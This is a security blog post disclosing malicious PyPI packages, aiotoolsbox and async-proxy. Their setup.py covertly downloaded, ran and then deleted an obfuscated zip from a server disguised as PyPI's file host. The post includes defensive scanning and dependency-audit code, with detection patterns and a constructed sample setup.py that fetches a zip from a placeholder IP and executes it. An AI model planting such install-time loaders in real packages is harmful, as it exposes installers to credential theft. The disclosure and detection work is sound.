By Ori Abramovsky

Highlights:

  1. Check Point CloudGuard Spectralops detected a malicious phishing account on PyPI, the leading Python package index.

  2. Users who installed the account’s packages were exposed to a malicious actor, probably a PII stealer.

  3. Once detected, we alerted PyPI about these packages. Soon after, the packages were removed by the PyPI team.

Intro

PyPI (Python Package Index) is the official repository of software packages for the Python programming language. It is a centralised platform where Python developers can find, install, and share open-source Python packages with others. PyPI is operated by the Python Software Foundation (PSF), and is accessible via the pip package installer, which is included with most Python installations. Users can search for packages by name or by keyword, and can download and install packages with a single command. PyPI hosts thousands of open-source Python packages, ranging from libraries for scientific computing and data analysis, to frameworks for web development and machine learning. Anyone can upload a package to PyPI, as long as it meets certain requirements and guidelines set by the PSF. PyPI has become an essential tool for the Python community, enabling developers to easily discover and use third-party packages, and encouraging collaboration and sharing among Python developers worldwide. Many popular Python frameworks and tools, such as Django, Flask, and Pandas, are available on PyPI, along with a vast array of other packages for various purposes, making it a critical resource for developers in the Python ecosystem.

The attack

It is important to note that malicious actors are not waiting: we keep seeing new techniques and strategies with which they try to hide their malicious intent, from steganography to crypto-jackers that hijack the installer’s system in order to mine cryptocurrency for their profit. The malicious packages that we’ve detected demonstrate how phishing is another tool attackers use to hide their intent. Using our machine learning models, we were able to detect these malicious packages on PyPI. While pretending to be async-io related helpers, these packages turned out to be malicious, covertly downloading and executing obfuscated code as part of their installation process. Moreover, the attacker published a few versions of the very same package with slight modifications, probably iterating towards a version that would be less visible to those who hunt for malicious packages on PyPI. More details on the detected packages follow.

The attack in detail

The first package that caught our attention was aiotoolsbox; while looking benign at first glance, it turned out to be an exact replica of the legitimate package aiotools. It’s important to note that while typosquatting (using package names that resemble popular benign ones in order to fool users into installing the malicious ones) is quite a common attack in the supply chain world, an identical copy of the benign package is a less common practice (in most cases mimicking the package name is enough) and is in general something we see more in the phishing world. Such effort can indicate a more sophisticated campaign, one that takes into account that installers may have a second look at the packages they are about to install (interestingly, a similar malicious campaign was previously identified by our machine learning models).

The benign package aiotools next to the malicious aiotoolsbox

Looking into the packages’ metadata, both share the same author while having a different maintainer. According to the PyPI package publishing protocol, the author fields are free text while the maintainer is an authenticated user, so the attacker could easily mimic the author field, while for the maintainer fields they needed to rely on something else.

The benign package aiotools contributors’ details next to the malicious aiotoolsbox

According to the aiotoolsbox maintainer details, they have been a PyPI contributor since 2019. Given that the only two packages they have were recently published, it’s fair to assume this account was recently breached.

aiotoolsbox PyPI maintainer page

Looking into the aiotoolsbox setup code, it includes a strange-looking snippet which, as part of the installation process, downloads a zip from the web, extracts it, executes it and finally deletes its content.

aiotoolsbox setup.py code

The first interesting point here is that the zip is downloaded from a server which is supposed to be ‘files.pythonhosted.org’. This turns out to be the second phishing layer of the attack, as the server tries to disguise itself as the official PyPI package hosting site.

The benign files.pythonhosted.org next to the aiotoolsbox malicious server in use

Another interesting point is the downloaded file name, which corresponds to the Python version in use; for example, someone using Python 3.9 will get a zip named 39.zip. This seems to be another level of phishing obfuscation, making the common user assume they are seeing something legitimate, probably some sort of pip internal flow.
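A reviewer can surface this install-time pattern before running `pip install` by statically parsing a package's setup.py. The following is an added example, not code from the original article or from CloudGuard Spectral; the call-pattern list, the trusted-host set and the sample setup.py (with a documentation-range IP) are assumptions constructed for illustration.

```python
import ast
import re
from urllib.parse import urlparse

# Assumed, non-exhaustive call patterns, grouped by install-time behaviour.
PATTERNS = {
    "download": ("urlretrieve", "urlopen", "requests.get"),
    "extract": ("extractall", "unpack_archive"),
    "execute": ("os.system", "subprocess.call", "subprocess.run", "exec"),
    "cleanup": ("shutil.rmtree", "os.remove", "os.unlink"),
}
TRUSTED_HOSTS = {"pypi.org", "files.pythonhosted.org"}  # exact match only

def dotted(node):
    """Rebuild 'pkg.mod.func' from a call target; chained calls keep the tail."""
    parts = []
    while isinstance(node, ast.Attribute):
        parts.append(node.attr)
        node = node.value
    if isinstance(node, ast.Name):
        parts.append(node.id)
    return ".".join(reversed(parts))

def scan_setup(source):
    """Report install-time behaviours and untrusted URL hosts in setup.py text."""
    behaviours, hosts = set(), set()
    for node in ast.walk(ast.parse(source)):
        if isinstance(node, ast.Call):
            name = dotted(node.func)
            behaviours.update(label for label, pats in PATTERNS.items()
                              if any(name == p or name.endswith("." + p) for p in pats))
        elif isinstance(node, ast.Constant) and isinstance(node.value, str):
            for url in re.findall(r"https?://[^\s'\"]+", node.value):
                hosts.add(urlparse(url).hostname or "")
    return {"behaviours": sorted(behaviours),
            "untrusted_hosts": sorted(hosts - TRUSTED_HOSTS),
            "suspicious": {"download", "execute"} <= behaviours}

# Constructed sample (arguments elided with ...); it is only parsed, never run.
SAMPLE_SETUP = '''
import urllib.request, zipfile, subprocess, shutil
from setuptools import setup
urllib.request.urlretrieve("http://192.0.2.10/39.zip", ...)
zipfile.ZipFile(...).extractall(...)
subprocess.call(...)
shutil.rmtree(...)
setup(name="example-pkg")
'''
```

Because hosts are compared by exact match, a lookalike of files.pythonhosted.org or a bare IP address is reported as untrusted.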

Looking into the downloaded zip, it included PyArmor-obfuscated code, which makes it difficult to clearly understand its malicious intent. Nevertheless, looking at the downloaded file names, it is fair to assume the package is a PII stealer, intending to collect and steal the installer’s secrets. Given that this zip was covertly downloaded during the installation process, we can conclude this is not a benign case.

The downloaded zip contents

The main.py entry script content

Looking back at the aiotoolsbox package structure, besides the mentioned setup.py, the rest of the files seem to be taken from the benign aiotools package, so the common user gets the base functionality they were searching for, not knowing they have just installed a malicious package.

The benign package aiotools files’ structure next to the malicious aiotoolsbox

Searching for previous versions of aiotoolsbox, we can interestingly notice that it was uploaded a few times with different versions (first 1.4.7 and only then 1.4.5 and 1.4.6).

Searching for aiotoolsbox previous releases

Looking into the difference between those versions, it turns out they had the very same structure; the only difference was in the setup.py file, and more specifically in the server IP they use. Checking the IP details, the initial version used a Russian IP while the later one was from Germany. This is probably yet another level of obfuscation, assuming a Russian IP will be more alarming than a German one.

aiotoolsbox recent version (1.4.6) vs the previous one (1.4.7)

The more recent (1.4.6) IP in use vs the previous one (1.4.7)

Finally, looking at the account’s other package, async-proxy: its setup.py lists aiotoolsbox as its only requirement, so anyone installing it installs the malicious aiotoolsbox as well.

async-proxy setup.py code
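Since a package can arrive only as someone else's requirement, an environment audit has to follow dependency chains rather than check top-level names. This is an added example, not code from the original article: it walks declared requirements and reports every chain that ends at one of the two packages named here. The helper names and the sample graph (including `my-service`) are hypothetical and constructed for illustration.

```python
import re
from importlib import metadata

BLOCKED = {"aiotoolsbox", "async-proxy"}  # the two packages named in this article

def norm(name):
    """PEP 503 normalisation, so 'Async_Proxy' and 'async-proxy' compare equal."""
    return re.sub(r"[-_.]+", "-", name).lower()

def req_name(requirement):
    """Project name from a Requires-Dist entry such as 'pkg[extra]>=1.0; marker'."""
    return norm(re.match(r"\s*([A-Za-z0-9._-]+)", requirement).group(1))

def installed_graph():
    """Map every installed distribution to the project names it requires."""
    return {norm(d.metadata["Name"]): [req_name(r) for r in (d.requires or [])]
            for d in metadata.distributions() if d.metadata["Name"]}

def find_exposed(graph, blocked=BLOCKED):
    """Return {package: dependency chain that ends at a blocked package}."""
    graph = {norm(k): [norm(d) for d in deps] for k, deps in graph.items()}
    blocked = {norm(b) for b in blocked}

    def walk(pkg, chain):
        if pkg in chain:                  # dependency cycle: stop here
            return None
        chain = chain + [pkg]
        if pkg in blocked:
            return chain
        for dep in graph.get(pkg, []):
            hit = walk(dep, chain)
            if hit:
                return hit
        return None

    found = {pkg: walk(pkg, []) for pkg in graph}
    return {pkg: chain for pkg, chain in found.items() if chain}

# Constructed environment: 'my-service' never names aiotoolsbox itself.
SAMPLE_GRAPH = {
    "my-service": ["requests", "Async_Proxy"],
    "async-proxy": ["aiotoolsbox"],
    "aiotoolsbox": [],
    "requests": ["urllib3"],
    "urllib3": [],
}
```

On a real environment, `find_exposed(installed_graph())` runs the same check against the installed distributions.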

Disclosure

We’ve disclosed the account to PyPI and soon after the mentioned packages were removed by the PyPI team.

How CloudGuard Spectral prevents such risk

With supply chain attacks increasing in frequency, it is essential to safeguard yourself by verifying all software ingredients you use, especially those which are not developed by you. At Check Point, our mission is to build a secure development process, equipping developers with the right tools to achieve this. To combat malicious packages leading to supply chain risks, we are vigilantly monitoring PyPI and NPM for malicious entities. After their identification, we inform NPM, prompting their immediate removal. By leveraging CloudGuard Spectral, you can remain safe and alert, enabling you to identify malicious actors quickly.
